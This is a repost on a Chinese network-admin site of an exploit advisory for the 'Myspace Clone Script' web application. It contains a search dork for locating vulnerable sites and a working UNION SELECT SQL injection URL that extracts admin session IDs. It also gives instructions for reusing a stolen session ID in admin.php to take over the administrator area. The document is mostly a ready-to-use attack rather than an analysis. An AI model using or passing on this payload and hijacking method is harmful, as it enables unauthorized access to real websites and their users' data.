网管联盟 | 网管论坛 | 网管u家 | 网管博客 | 网管软件 | 网管求职 | 小游戏 | 网管搜索 | 网管原创 | 网管聚合 | 网管读摘 | 网管焦点 | 世界素材 | 会员投稿 | 会员中心 
中国网管联盟
Windows Linux Cisco 网络技术 数据库 黑客攻防 DotNet Java PHP 认证 新闻资讯 服务器 存储资讯 网络设备 网管学堂 技术专题 焦点 网吧频道
 当前位置: > bitsCN.com > 网络攻防 > 黑客技术 > Exploit > Myspace Clone Script Remote SQL Injection Vulnerability  

Myspace Clone Script Remote SQL Injection Vulnerability

2007-11-16  作者:bitsCN整理  来源:  点评 投稿 收藏

--==+======================================================+==--
--==+  Myspace Clone Script SQL Injection Vulnerabilitys   +==--
--==+======================================================+==--

AUTHOR: t0pP8uZz & xprog
SITE: datecomm.com
DORK (altavista.com): "Search | Invite | Mail | Blog | Forum"


DESCRIPTION:
pull admin session id's from the database, then visit admin area.


EXPLOITS:
index.php?pg=forums&s=viewcat&seid=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,sess_id,7,8,9,10/**/FROM/**/admin/*


NOTE/TIP:
after executing the Injection you will see a SessionID.

Use the session id in the below URL:
admin.php?pg=users&adsess=SESSION_ID

example:
http://www.site.com/admin.php?pg=users&adsess=54f824ebcde36ee8844c103d97412123

Do Not Click Logout! as it will delete the sessionid from the DB.


GREETZ: milw0rm.com, H4CK-Y0u.org! 网管网www.bitscn.com


--==+================================================================================+==--
--==+    Myspace Clone Script SQL Injection Vulnerabilitys             +==--
--==+================================================================================+==--
TAGs     the   Injection   session   admin   pg   from   will   Myspace      
 上一篇:Toko Instan 7.6 Multiple Remote SQL Injection Vulnerabilities   下一篇:Apple Mac OS X 10.4.x Kernel i386_set_ldt() Integer Overflow PoC
相关文章列表
Myspace Clone Script Remote SQL Injection Vulnerability 评论:
loading.. 评论加载中…
评论:请自觉遵守互联网相关政策法规,评论不得超过250字。

验证码: 注册用户
本类热门排行:
1.Scripteen Free Image Hosting Script 1.
2.PPMate PPMedia Class ActiveX Control B
3.Apache mod_jk 1.2.19 Remote Buffer Ove
4.Microsoft Access (Snapview.ocx 10.0.55
5.Cisco IOS 12.3(18) FTP Server Remote E
6.Trend Micro OfficeScan ObjRemoveCtrl A
7.Windows Media Encoder wmex.dll ActiveX
8.Linux Kernel <= 2.6.20 with DCCP Su
9.NaviCOPA Web Server 2.01 Remote Buffer
10.Simple Machines Forum <= 1.1.5 Admi
最新推荐文章:
1.Cheats Complete Website 1.1.1 (itemid)
2.Drinks Complete Website 2.1.0 (drinkid
3.BitDefender Online Scanner 8 ActiveX H
4.PHP < 4.4.5 / 5.2.1 (shmop) SSL RSA
5.PHP COM extensions (inconsistent Win32
6.PHP 4.4.6 crack_opendict() Local Buffe
7.Internet Explorer ActiveX bgColor Prop
8.CVSTrac 2.0.0 Post-Attack Database Res
9.GuppY <= 4.5.16 Remote Commands Exe
10.Trend Micro VirusWall Buffer Overflow
网管论坛交流:
·什么样的游戏,什么样的爱情.
·大家来开心一下吧---看了会很开心的东西-
·中国人不可不知道的知识
·@@小鹏◎◎小鹏同志与某位女明星亲密接触
·◎◎小鹏◎◎发现不明生物,居然正在交配
·[图文]^^^版主是什么?????
·泡论坛的女人是好女人
·做个“水性杨花”的女人
·献给mm俱乐部的所有mm
·深圳一集团企业电脑基础应用培训教程